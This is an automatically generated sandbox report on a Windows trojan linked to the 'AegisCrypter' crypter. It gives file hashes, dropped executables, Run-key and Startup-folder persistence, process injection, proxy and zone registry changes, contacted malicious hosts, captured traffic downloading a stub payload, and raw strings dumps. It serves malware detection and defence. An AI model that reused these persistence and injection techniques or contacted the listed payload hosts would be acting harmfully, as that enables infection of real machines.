Gen.Variant.Zusy.218973_13e6cdc6ab

by malwarelabrobot on March 31st, 2017 in Malware Descriptions.

Trojan.Win32.Diple.guhf (Kaspersky), Gen:Variant.Zusy.218973 (AdAware), Trojan.Win32.Delphi.FD, Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, GenericPhysicalDrive0.YR (Lavasoft MAS)
Behaviour: Trojan, VirTool


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 13e6cdc6abc89f8ea1d3e0bc2b93aaa5
SHA1: aa50a501e6b7a212ada32bf4fcf172b4999c9882
SHA256: b016c081540f915af9c64b480aa0d5edbb5b42c408a7cc85cfb032e15a67619b
SSDeep: 49152:8XNHCjUjHNnoQyqcqJ35rZfxeFUVkeiVsuM3O4h/DcfsQGQScHDos0n7qXuEdYi1: NHCjUjHpYqJ33fxeFUVhquOmrc150kl
Size: 3073986 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Xacti, LLC
Created at: 2015-12-27 07:38:55
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

YEFDGYT.EXE:264
%original file name%.exe:3404
aegis.exe:3360
WScript.exe:3520

The Trojan injects its code into the following process(es):

Chrome.exe:1472
AegisCrypter.exe:3500

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process YEFDGYT.EXE:264 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Chrome.exe (7386 bytes)

The process %original file name%.exe:3404 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\AegisCrypter.exe (76392 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aegis.exe (25213 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr4EAB.tmp (0 bytes)

The process aegis.exe:3360 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Chrome.vbs (41546 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr511B.tmp (0 bytes)

The process Chrome.exe:1472 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ~~{Mutex}~~.exe (7385 bytes)

The process WScript.exe:3520 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\YEFDGYT.EXE (249034 bytes)

The process AegisCrypter.exe:3500 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\M9IJLAFN.txt (118 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\F150F31D (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\XKSK093Z.txt (118 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\FreeStub20170327[1].Bin (11250 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Stub\FreeStub20170327.Bin (14090 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\M9IJLAFN.txt (0 bytes)

Registry activity

The process YEFDGYT.EXE:264 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Environment]
"SEE_MASK_NOZONECHECKS" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\ ~~{Mutex}~~]
"US" = "@"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process %original file name%.exe:3404 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process aegis.exe:3360 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process Chrome.exe:1472 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
" ~~{Mutex}~~" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Chrome.exe .."

The process AegisCrypter.exe:3500 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\AegisCrypter_RASAPI32]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Enigma Protector\89B67B806DFED215-CC5AC9EB45024DCD\17B1E42318790B1D-DAA3FCF96F7419DF]
"86842EE1" = "3B 4A B6 57 5D 1D 26 2F 29 F9 75 AA 37 29"

[HKLM\SOFTWARE\Microsoft\Tracing\AegisCrypter_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"

[HKCU\Software\Enigma Protector\89B67B806DFED215-CC5AC9EB45024DCD]
"Options" = "15 4C 24 06 DE 78 5B C7 E5 A6 10 B3 A8 0A 24 5F"

[HKLM\SOFTWARE\Microsoft\Tracing\AegisCrypter_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\AegisCrypter_RASMANCS]
"EnableConsoleTracing" = "0"
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\AegisCrypter_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\AegisCrypter_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\AegisCrypter_RASAPI32]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

Dropped PE files

MD5 File path
48ac4b5e32391b01adf163c6a07f8646 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\AegisCrypter.exe
295cd21df32a90940868a648b5f3d2dc c:\Users\"%CurrentUserName%"\AppData\Local\Temp\Chrome.exe
295cd21df32a90940868a648b5f3d2dc c:\Users\"%CurrentUserName%"\AppData\Local\Temp\YEFDGYT.EXE
8e71e87d7481f4cd0a6672a370383954 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\aegis.exe
295cd21df32a90940868a648b5f3d2dc c:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ~~{Mutex}~~.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 24124 24576 4.45853 1a13b408c917b27c9106545148d3b8d3
.rdata 28672 4714 5120 3.46982 921acf8cb0aea87c0603fa899765fcc2
.data 36864 154936 1536 2.97482 797517c6ef57aa95d53df2cf07568953
.ndata 192512 32768 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 225280 136320 136704 3.45074 e101ebc8a7238ab98b6802ad45723500

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://i.aegiscrypter.com/x/ab.xml 104.18.40.91
hxxp://i.aegiscrypter.com/x/pb.xml 104.18.40.91
hxxp://i.aegiscrypter.com/x/pb/FreeStub20170327.Bin 104.18.40.91
imaneblueyes.ddns.net 141.255.144.148
dns.msftncsi.com 131.107.255.255


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

POST /x/pb.xml HTTP/1.1
Accept: */*
Cache-Control: no-cache
Referer: i.aegiscrypter.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: i.aegiscrypter.com
Content-Length: 18

i...a.e.g.i.s.c.r.
HTTP/1.1 200 OK
Date: Thu, 30 Mar 2017 13:21:07 GMT
Content-Type: application/xml
Content-Length: 20
Connection: keep-alive
Set-Cookie: __cfduid=d76f21e0f2ec7244614e8ba63ca0237491490880067; expires=Fri, 30-Mar-18 13:21:07 GMT; path=/; domain=.aegiscrypter.com; HttpOnly
Accept-Ranges: bytes
ETag: W/"20-1490595606930"
Last-Modified: Mon, 27 Mar 2017 06:20:06 GMT
Server: cloudflare-nginx
CF-RAY: 347b5ec345c372d7-AMS
FreeStub20170327.BinHTTP/1.1 200 OK..Date: Thu, 30 Mar 2017 13:21:07 G
MT..Content-Type: application/xml..Content-Length: 20..Connection: kee
p-alive..Set-Cookie: __cfduid=d76f21e0f2ec7244614e8ba63ca0237491490880
067; expires=Fri, 30-Mar-18 13:21:07 GMT; path=/; domain=.aegiscrypter
.com; HttpOnly..Accept-Ranges: bytes..ETag: W/"20-1490595606930"..Last
-Modified: Mon, 27 Mar 2017 06:20:06 GMT..Server: cloudflare-nginx..CF
-RAY: 347b5ec345c372d7-AMS..FreeStub20170327.Bin..



POST /x/ab.xml HTTP/1.1
Accept: */*
Cache-Control: no-cache
Referer: i.aegiscrypter.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: i.aegiscrypter.com
Content-Length: 18

i...a.e.g.i.s.c.r.
HTTP/1.1 200 OK
Date: Thu, 30 Mar 2017 13:21:05 GMT
Content-Type: application/xml
Content-Length: 54
Connection: keep-alive
Set-Cookie: __cfduid=da7a3ff3b8f2aac49af7326f6c22c8dff1490880064; expires=Fri, 30-Mar-18 13:21:04 GMT; path=/; domain=.aegiscrypter.com; HttpOnly
Accept-Ranges: bytes
ETag: W/"54-1488464940806"
Last-Modified: Thu, 02 Mar 2017 14:29:00 GMT
Server: cloudflare-nginx
CF-RAY: 347b5eb5805f7295-AMS
9.0|hXXp://i.aegiscrypter.com/x/ab/Aegiscrypter9.0.BinHTTP/1.1 200 OK.
.Date: Thu, 30 Mar 2017 13:21:05 GMT..Content-Type: application/xml..C
ontent-Length: 54..Connection: keep-alive..Set-Cookie: __cfduid=da7a3f
f3b8f2aac49af7326f6c22c8dff1490880064; expires=Fri, 30-Mar-18 13:21:04
 GMT; path=/; domain=.aegiscrypter.com; HttpOnly..Accept-Ranges: bytes
..ETag: W/"54-1488464940806"..Last-Modified: Thu, 02 Mar 2017 14:29:00
 GMT..Server: cloudflare-nginx..CF-RAY: 347b5eb5805f7295-AMS..9.0|http
://i.aegiscrypter.com/x/ab/Aegiscrypter9.0.Bin....


GET /x/pb/FreeStub20170327.Bin HTTP/1.1


User-Agent: AegisCrypter
Host: i.aegiscrypter.com
Cookie: __cfduid=d76f21e0f2ec7244614e8ba63ca0237491490880067


HTTP/1.1 200 OK
Date: Thu, 30 Mar 2017 13:21:07 GMT
Content-Type: text/plain
Content-Length: 236323
Connection: keep-alive
Accept-Ranges: bytes
ETag: W/"236323-1490595468410"
Last-Modified: Mon, 27 Mar 2017 06:17:48 GMT
Server: cloudflare-nginx
CF-RAY: 347b5ec497a37295-AMS
[...7.U5..MV..&.}.....6.RB..%\.V*.X...P......(....1.:I*[.......}...2.-
[.r..:...h^H...(...$V....|.).t.}....L..I...........F.!....Y. `4...g...
.....p.......}r.u....F....r...wV..\]M*.......)....$S.......#..0.)..V.{
...*5g.3.JL..$..H.v=`..hy=u...J..o.H.A....E.Jo........-.._j..HkL....W.
....*.......k...!.&%.WN:.dr...]2/....a..'...%mu.p........<........0
......O6.*..2.....D..'"..N.@5....q.>w..:...........@_........E.q..n
B...~.g....VC/...?P....0..t..i.H..L..4....w\....b)}.....jcE.G..*d...l0
.g..k8.`3....PI....l._.E...C..V..&i..Dw.......E...M..,`q..}.)...{.yI..
.9m_bG...h.F..S....f...=W.>eP90Bk...X..:`.~.>..n.1\7e...e.(.{eO3
......j|.....`....O.......NlOl..k.........{BD....'..i.386~...v.......'
......0..t............. ".2@...c...W.E,:..j..S..)}..?{..C".8...d..f...
\......VQ.Gr.T..N.~4..K..R.j......N...on.-..{-.cc.DE....;..J.......8..
.d.....WQ.P......<.R.:s.......hO.b....F.3$....:.0...N..m.X._.f.;e.$
..M#.,..[.}.....lz3...@....p_....r ..0P.=...p.M......[...HU.'...Kg.P.=
...k.l*..K........2....-._%.......$l..p.\........g..........P0..CLG..~
..Es..._..k%F......d..d3.....jlv...#NK.,..^.....ni..S...;...=.....<
1_H.|O....yH...xI..R..M.:.D.D2.M.V..K...hE.?..p..O.1`.......63.......W
......f.Lm.Z4?8.2...^.b#.C...a...3..#y.....j{..6q...?.....c..?xdq..7..
.2.?....#......'....Uo./n..........%..-Q..Oe.....pE.GXj.......v.|N..=.
.!O.....k.....U.5.Q=........%....5......._5.....|3Q^s.L.we]?..!..lB...
!E.Tk... ].w.u|>j........;.c...zNZj..B..G..Wi...!U.WG..C......m4.@[
...?.a.Q..dv........W.?.)........J..H.;..G4.....%..... .....U.]...
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

AegisCrypter.exe_3500:

B.rsrc
.data
SSSSSh:;
SSSSh
j%Sh6
SSSSh,
SSSShD
SSSSSh
9>t.hXv)
u$SShe
tFHt:Ht.Ht"Hu`
j%XtL9E
t'SShl
SSSShx67
tWSShW
tl9_ tgSSh
FTCP
tAHt.HHt
FtPW
SSh@B
<SShG
s%j.Zf
xSSSh
FTPjKS
FtPj;S
C.PjRV
RegOpenKeyTransactedW
RegCreateKeyTransactedW
CNotSupportedException
CCmdTarget
RegDeleteKeyTransactedW
CHttpConnection
CHttpFile
RegDeleteKeyExW
TaskDialogIndirect
CMDITabProxyWnd
CMDIChildWndEx
CMDIFrameWndEx
CMDIChildWnd
CMDIFrameWnd
CMDIClientAreaWnd
CMFCToolBarsKeyboardPropertyPage
GetProcessWindowStation
operator
portuguese-brazilian
inflate 1.2.8 Copyright 1995-2013 Mark Adler
Visual C   CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
AppLaunched=z.cmd
FILE0="z.cmd"
FILE1="z.cm_"
TargetName=%s
SourceFiles0=%s
?456789:;<=
!"#$%&'()* ,-./0123
CExetovbs
HttpOpenRequestW
HttpSendRequestW
CLoginDlg
d-d-d-custom
G:\MYProject\AegisCrypter\Release\Aegiscrypter.pdb
.PAVCOleException@@
.PAVCObject@@
.PAVCMemoryException@@
.PAVCSimpleException@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCInternetException@@
.?AVCHttpConnection@@
.?AVCHttpFile@@
.PAVCOleDispatchException@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WV12@PB_W@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAVCDocument@@PAV3@@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W_N_N@@
.?AV?$CMap@PAVCDocument@@PAV1@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W@@
.PAVCArchiveException@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@
.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@
.?AVCMFCToolBarCmdUI@@
.PAVCFileException@@
.?AVCMDITabProxyWnd@@
.?AVCMDIChildWndEx@@
.?AVCMDIChildWnd@@
.?AVCMDIFrameWndEx@@
.?AVCMDIFrameWnd@@
.?AVCMFCCmdUsageCount@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAVCObList@@PAV3@@@
.?AV?$CList@PAVCMDIChildWndEx@@PAV1@@@
.?AVCMDIClientAreaWnd@@
.?AVCMFCRibbonCmdUI@@
.?AVCMFCColorBarCmdUI@@
.?AV?$CMap@KKV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W@@
.?AVCMFCAcceleratorKey@@
.?AVCMFCToolBarsKeyboardPropertyPage@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WHH@@
.?AVCMFCRibbonKeyTip@@
.?AVCMFCTasksPaneToolBarCmdUI@@
.?AVCMFCAcceleratorKeyAssignCtrl@@
zcÁ
1.2.8
.?AVCCmdTarget@@
.PAVCException@@
.rsrc
6.RYMWr2
U]r.sL
lQ@t^|n`%C
G46%x)
qB.oz
j.LcJ
cXd%s~
5-'.vO
.V-e}?
$Tl
d1MJ%F
S..odJ
bs{mN)
.XkpE
`%UoX
Pw&.OmdA
X%fS;
R[.ag;
[,tcpM
.lB,^}
version="0.0.0.0"
<description>UPX executable packer</description>
KERNEL32.DLL
msvcrt.dll
.text
`.rdata
@.data
KERNEL32.dll
ShellExecuteA
SHELL32.dll
MSVCRT.dll
_acmdln
%s.%s
;L.ll8
KEYKYY
!"#$%&'()* ,-./
GUfx.DL1
-B`.rd
USER32.dll
iexpress.exe
makecab.exe
wextract.exe
X.SED
\.iUmj
NZS%x
Lh-g}
%SAjH
.Yq>0Ea
g%sW|
.YrNu
PSSSSSSh
.?AVCExetovbs@@
.?AVCLoginDlg@@
FreeStub20170327.Bin
**.dU
"!#! "! "! "! "! "! "! "! "! "! "! "! "! "! "
!#$"$%"#%"#%$#%$#$$#$$"%#"$#"$##$#"#"!#"!#! "! "! "! "
%%'%%&%%&%$&%%&%%&%$&%$&%$&$$%$#%$#%#"$#"$#"$"!#"!#!!" "
! !"!#"!#
&&'&&''&('&(('((')(')(')(')(')
))*%&'(')(')(')(')(')('('&((&)'&(&%'&%'&%'&%'&%'%$&$#%$#%#"$"!#"!#!!#
!! ""!##"$
(')'&('&(('))(**) *) *) *) *) *) 
*) *) *) *) *) *) )(*)(*(')'&('&('&(&%'&%'&%'&%'%$&%$%$#%#!#"!# "
!!!""!##"$%$&
)(**) *) *) *)  *, *, *, *, *, *,$#ÌC
 *, *, *, *, *, *,*) *) *) *) *) )(*)(*(')''('&(&%'&%'%$&%$&#"$"!#!!" !
!! ! !"!"#$#%%$&%$&
, -, -, -, -, - *, *, *, *, *,** ** *) *)*)(*('*'&)&%($&'%$&$$&##&""# !" !
! """#$$%%$&&%''&'''(
  - *,, --,.-,.-,..-/-,.-,.-,.0/1
.-/.-/-,.-,.-,.-,.-,.-,., -, - *, *, *,** *) *)*)(*(')'''&%'%$&%$&$#%"!#! "
.-/.-/.-/.-//.0/.0/.00/1102
! "!"###%%$&&%'&&'''()(**)  *,
%$&0/1102102102213, -
<;=, -0/10/10/10/10/10/00/10/1/.0/.0.-/.-/.-.-,., - *,    * *) )(*'&('&(%$&$#%#"$! "
! !"##$$$&%$&'&'(')))**)  *    ,,-"!#878
457568<<=;;=;;=;;=9:;668
023;=>;>?=>?>>@>>@>>@>>@./0
)! (&#"&"#&"#&"#'##'##&"#&"#&"#&"#&"#&"#&"#'#$($$&%""'!#&!#&!#&!#&!"%!"%!"%!"%!"%!"%!"%!"%!"%!"% !%& &  &*
.3rHHuddddddddHHHHr!.xxx
GGGx.nn
»BBBBBBBBBBB%sssss
#$$$$$$$_!
(.Wy;!
"%XC4
w%x>H
)))%---3'''
...}:::'333
'''@)))=111
111.FFF
...Sddd
...LKKK
111.nnn
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><ms_windowsSettings:dpiAware xmlns:ms_windowsSettings="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings" xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</ms_windowsSettings:dpiAware></windowsSettings></application></assembly>
.idata
.edata
P.reloc
P.rsrc
kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
Windows 95
WIN_VER_WINDOWS95
Windows 95 OSR2
WIN_VER_WINDOWS95OSR2
Windows 98
WIN_VER_WINDOWS98
Windows 98 SE
WIN_VER_WINDOWS98SE
Windows ME
WIN_VER_WINDOWSME
Windows 2000
WIN_VER_WINDOWS2000
Windows 2000 Professional
WIN_VER_WINDOWS2000PROF
Windows 2000 Data Server
WIN_VER_WINDOWS2000DATASERVER
Windows 2000 Advanced Server
WIN_VER_WINDOWS2000ADVSERVER
Windows 2000 Server
WIN_VER_WINDOWS2000SERVER
Windows XP
WIN_VER_WINDOWSXP
Windows XP Home
WIN_VER_WINDOWSXPHOME
Windows XP Professional
WIN_VER_WINDOWSXPPROF
Windows XP Professional x64
WIN_VER_WINDOWSXPPROFx64
Windows XP Professional Datacenter x64
WIN_VER_WINDOWSXPPROFDATACENTERx64
Windows XP Professional Enterprise x64
WIN_VER_WINDOWSXPPROFENERPRICEx64
Windows XP Professional Standart x64
WIN_VER_WINDOWSXPPROFSTANDARTx64
Windows 2003
Windows 2003 Server
WIN_VER_WINDOWS2003SERVER
Windows 2003 Server R2
WIN_VER_WINDOWS2003SERVERR2
Windows 2003 Storage Server
WIN_VER_WINDOWS2003STORAGESERVER
Windows 2003 Datacenter Itanium
WIN_VER_WINDOWS2003DATACENTERITANIUM
Windows 2003 Enterprise Itanium
WIN_VER_WINDOWS2003ENTERPRICEITANIUM
Windows 2003 Datacenter x64
WIN_VER_WINDOWS2003DATACENTERx64
Windows 2003 Enterprise x64
WIN_VER_WINDOWS2003ENERPRICEx64
Windows 2003 Standart x64
WIN_VER_WINDOWS2003STANDARTx64
Windows 2003 Compute
WIN_VER_WINDOWS2003COMPUTE
Windows 2003 Datacenter
WIN_VER_WINDOWS2003DATACENTER
Windows 2003 Enterprise
WIN_VER_WINDOWS2003ENTERPRICE
Windows 2003 Web
WIN_VER_WINDOWS2003WEB
Windows 2003 Standart
WIN_VER_WINDOWS2003STANDART
Windows Vista
WIN_VER_WINDOWSVISTA
Windows Vista Business
WIN_VER_WINDOWSVISTA_BUSINESS
Windows Vista Cluster Server
WIN_VER_WINDOWSVISTA_CLUSTER_SERVER
Windows Vista Datacenter Server
WIN_VER_WINDOWSVISTA_DATACENTER_SERVER
Windows Vista Datacenter Server Core
WIN_VER_WINDOWSVISTA_DATACENTER_SERVER_CORE
Windows Vista Datacenter Server Core V
WIN_VER_WINDOWSVISTA_DATACENTER_SERVER_CORE_V
Windows Vista Datacenter Server V
WIN_VER_WINDOWSVISTA_DATACENTER_SERVER_V
Windows Vista Enterprise
WIN_VER_WINDOWSVISTA_ENTERPRICE
Windows Vista Enterprise Server
WIN_VER_WINDOWSVISTA_ENTERPRISE_SERVER
Windows Vista Enterprise Server Core
WIN_VER_WINDOWSVISTA_ENTERPRISE_SERVER_CORE
Windows Vista Enterprise Server V
WIN_VER_WINDOWSVISTA_ENTERPRISE_SERVER_V
Windows Vista Enterprise Server Core V
WIN_VER_WINDOWSVISTA_ENTERPRISE_SERVER_CORE_V
Windows Vista Enterprise Server IA64
WIN_VER_WINDOWSVISTA_ENTERPRISE_SERVER_IA64
Windows Vista Home Basic
WIN_VER_WINDOWSVISTA_HOME_BASIC
Windows Vista Home Premium
WIN_VER_WINDOWSVISTA_HOME_PREMIUM
Windows Vista Home Server
WIN_VER_WINDOWSVISTA_HOME_SERVER
Windows Vista Server For Small Business
WIN_VER_WINDOWSVISTA_SERVER_FOR_SMALLBUSINESS
Windows Vista Small Business Server
WIN_VER_WINDOWSVISTA_SMALLBUSINESS_SERVER
Windows Vista Small Business Server Premium
WIN_VER_WINDOWSVISTA_SMALLBUSINESS_SERVER_PREMIUM
Windows Vista Medium Business Server Management
WIN_VER_WINDOWSVISTA_MEDIUMBUSINESS_SERVER_MANAGEMENT
Windows Vista Medium Business Server Messaging
WIN_VER_WINDOWSVISTA_MEDIUMBUSINESS_SERVER_MESSAGING
Windows Vista Medium Business Server Security
WIN_VER_WINDOWSVISTA_MEDIUMBUSINESS_SERVER_SECURITY
Windows Vista Standard Server
WIN_VER_WINDOWSVISTA_STANDARD_SERVER
Windows Vista Standard Server V
WIN_VER_WINDOWSVISTA_STANDARD_SERVER_V
Windows Vista Standard Server Core
WIN_VER_WINDOWSVISTA_STANDARD_SERVER_CORE
Windows Vista Standard Server Core V
WIN_VER_WINDOWSVISTA_STANDARD_SERVER_CORE_V
Windows Vista Starter
WIN_VER_WINDOWSVISTA_STARTER
Windows Vista Storage Enterprise Server
WIN_VER_WINDOWSVISTA_STORAGE_ENTERPRISE_SERVER
Windows Vista Storage Express Server
WIN_VER_WINDOWSVISTA_STORAGE_EXPRESS_SERVER
Windows Vista Storage Standard Server
WIN_VER_WINDOWSVISTA_STORAGE_STANDARD_SERVER
Windows Vista Storage Workgroup Server
WIN_VER_WINDOWSVISTA_STORAGE_WORKGROUP_SERVER
Windows Vista Undefined
WIN_VER_WINDOWSVISTA_UNDEFINED
Windows Vista Ultimate
WIN_VER_WINDOWSVISTA_ULTIMATE
Windows Vista Web Server
WIN_VER_WINDOWSVISTA_WEB_SERVER
Windows Vista Web Server Core
WIN_VER_WINDOWSVISTA_WEB_SERVER_CORE
Windows Vista Unlicensed
WIN_VER_WINDOWSVISTA_UNLICENSED
Windows 2008
WIN_VER_WINDOWS2008
Windows 2008 Business
WIN_VER_WINDOWS2008_BUSINESS
Windows 2008 Cluster Server
WIN_VER_WINDOWS2008_CLUSTER_SERVER
Windows 2008 Datacenter Server
WIN_VER_WINDOWS2008_DATACENTER_SERVER
Windows 2008 Datacenter Server Core
WIN_VER_WINDOWS2008_DATACENTER_SERVER_CORE
Windows 2008 Datacenter Server Core V
WIN_VER_WINDOWS2008_DATACENTER_SERVER_CORE_V
Windows 2008 Datacenter Server V
WIN_VER_WINDOWS2008_DATACENTER_SERVER_V
Windows 2008 Enterprise
WIN_VER_WINDOWS2008_ENTERPRICE
Windows 2008 Enterprise Server
WIN_VER_WINDOWS2008_ENTERPRISE_SERVER
Windows 2008 Enterprise Server Core
